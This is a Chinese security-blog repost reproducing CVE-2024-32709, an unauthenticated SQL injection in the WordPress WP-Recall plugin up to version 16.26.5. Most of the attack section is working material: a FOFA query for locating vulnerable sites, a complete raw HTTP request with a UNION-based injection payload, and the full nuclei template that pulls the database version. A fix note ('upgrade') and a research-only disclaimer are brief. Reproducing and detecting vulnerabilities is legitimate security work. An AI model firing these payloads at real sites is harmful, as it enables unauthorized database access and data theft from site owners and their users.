CVE-2024-32709 漏洞复现 poc

admin
admin
admin
138647
文章
114
评论
2024年7月10日11:36:41评论69 views字数 2320阅读7分44秒阅读模式

使

01

漏洞名称

WordPress WP-Recall 插件 <= 16.26.5 - SQL 注入漏洞

02

漏洞影响

WP-Recall版本从n/a到16.26.5

03

漏洞描述

Plechev Andrey WP-Recall存在SQL注入漏洞。该漏洞影响WP-Recall版本从n/a到16.26.5。攻击者可以利用该漏洞在SQL命令中不恰当地中立化特殊元素,造成数据库被恶意操作的风险。

04

FOFA搜索语句
"/wp-content/plugins/wp-recall/"

CVE-2024-32709 漏洞复现 poc

05

漏洞复现

向靶场发送如下数据包

GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(123456),0x7c),13--+- HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36Connection: close

CVE-2024-32709 漏洞复现 poc

漏洞复现成功

06

nuclei poc

nuclei官方已发布poc,文件内容如下

id: CVE-2024-32709info:  name: WP-Recall <= 16.26.5 - SQL Injection  author: securityforeveryone  severity: critical  description: |    The WP-Recall Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.  remediation: Fixed in 16.26.6  reference:    - https://nvd.nist.gov/vuln/detail/CVE-2024-32709    - https://github.com/truonghuuphuc/CVE-2024-32709-Poc    - https://patchstack.com/database/vulnerability/wp-recall/wordpress-wp-recall-plugin-16-26-5-sql-injection-vulnerability?_s_id=cve  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L    cvss-score: 9.3    cve-id: CVE-2024-32709    cwe-id: CWE-89    epss-score: 0.00043    epss-percentile: 0.0866  metadata:    verified: true    max-request: 1    publicwww-query: "/wp-content/plugins/wp-recall/"  tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp,sqlivariables:  num: "999999999"http:  - raw:      - |        GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1        Host: {{Hostname}}    matchers-condition: and    matchers:      - type: word        part: body        words:          - '{{md5(num)}}'      - type: status        status:          - 200# digest: 490a004630440220133ca9cf2f1029c377a0637602b2f99279abe7bbcad1da1f3e66733f6563d26e02207da0cf317afc9c589b8a2c4e7551e7613d75b026f1d89f2fd06642435a38b96f:922c64590222798bb761d5b6d8e72950

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-32709 漏洞复现 poc

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月10日11:36:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-32709 漏洞复现 pochttps://cn-sec.com/archives/2938299.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息